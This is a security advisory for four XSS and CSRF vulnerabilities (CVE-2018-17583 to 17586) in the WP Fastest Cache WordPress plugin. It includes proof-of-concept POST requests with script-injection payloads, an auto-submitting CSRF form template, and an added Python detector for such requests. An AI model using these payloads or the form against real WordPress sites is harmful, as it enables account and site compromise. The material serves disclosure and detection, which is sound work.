Tested Version: 0.8.8.5
Discovered Date: September 26 2018
Fixed Version: 0.8.8.6
Fixed Date: October 9 2018
Active installations: 700,000+
#1 - CVE-2018-17585 - XSS → wpFastestCachePage options
Locate → http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions
Affected Vectors:
wpFastestCachePreload_number
wpFastestCacheLanguage
Exploit Request:
POST /wordpress/wp-admin/admin.php?page=wpfastestcacheoptions HTTP/1.1
wpFastestCachePreload_number=4<script>alert(1);</script>
wpFastestCacheLanguage=eng"><script>alert(2);</script>
#2 - CVE-2018-17586 - XSS - action → wpfc_save_timeout_pages
Affected Vectors:
rules[0][content]
Exploit Request:
POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1
rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(3)%3B%3C%2Fscript%3E
#3 - CVE-2018-17583 - XSS - action → wpfc_save_exclude_pages
Affected Vectors:
rules[0][content]
Exploit Request:
POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1
rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(4)%3B%3C%2Fscript%3E
#4 - CVE-2018-17584 - CSRF in page → wpfastestcacheoptions
Create an *.html file containing the following form:
<form method="POST" action="http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions">
<input type="text" name="wpFastestCachePage" value="options"><br />
<input type="text" name="wpFastestCachePreload_number" value="Enter the payload"><br />
<input type="text" name="wpFastestCacheLanguage" value="engEnter the payload"><br />
<input type="text" name="submit" value="Save Changes"><br />
<input type="submit">
</form>
Payload: "><script>alert(1);</script>
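Detection logic for the requests listed above, added here as an example (it is not part of the original advisory or of the plugin's code): it parses a POST to the two endpoints, extracts the affected parameters, and flags markup characters, a non-numeric preload number, or a cross-origin submission. The function names, the numeric-only rule for wpFastestCachePreload_number, and the sample request in the last lines are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Vectors as listed in the advisory above.
OPTIONS_PAGE = "wpfastestcacheoptions"
OPTIONS_PARAMS = {"wpFastestCachePreload_number", "wpFastestCacheLanguage"}
AJAX_ACTIONS = {"wpfc_save_timeout_pages", "wpfc_save_exclude_pages"}
RULE_CONTENT = re.compile(r"^rules\[\d+\]\[content\]$")
# Characters needed to close an attribute or open a tag.
MARKUP = re.compile(r"[<>\"']")


def affected_fields(target, body):
    """Return (name, value) pairs for the body fields the advisory names."""
    url = urlsplit(target)
    query = dict(parse_qsl(url.query))
    fields = parse_qsl(body, keep_blank_values=True)  # decodes %XX in names and values
    if url.path.endswith("/wp-admin/admin.php") and query.get("page") == OPTIONS_PAGE:
        return [(n, v) for n, v in fields if n in OPTIONS_PARAMS]
    if url.path.endswith("/wp-admin/admin-ajax.php"):
        # admin-ajax.php accepts "action" in either the query string or the body.
        action = dict(fields).get("action") or query.get("action")
        if action in AJAX_ACTIONS:
            return [(n, v) for n, v in fields if RULE_CONTENT.match(n)]
    return []


def inspect_post(target, body, host, origin=None):
    """Return findings for one POST; origin is the Origin header, if sent."""
    hits = affected_fields(target, body)
    findings = []
    for name, value in hits:
        if MARKUP.search(value):
            findings.append(f"markup in {name}")
        elif name == "wpFastestCachePreload_number" and not value.isdigit():
            # Assumption: this setting is a plain count, so anything else is suspect.
            findings.append(f"non-numeric {name}")
    # CVE-2018-17584 signal: settings change submitted from a different origin.
    if hits and origin and urlsplit(origin).netloc != host:
        findings.append("cross-origin POST")
    return findings


if __name__ == "__main__":
    # Constructed sample: the encoded body shown above plus an explicit action field.
    body = ("action=wpfc_save_exclude_pages&rules%5B0%5D%5Bcontent%5D="
            "%22%3E%3Cscript%3Ealert(4)%3B%3C%2Fscript%3E")
    print(inspect_post("/wordpress498/wp-admin/admin-ajax.php", body, "localhost"))
```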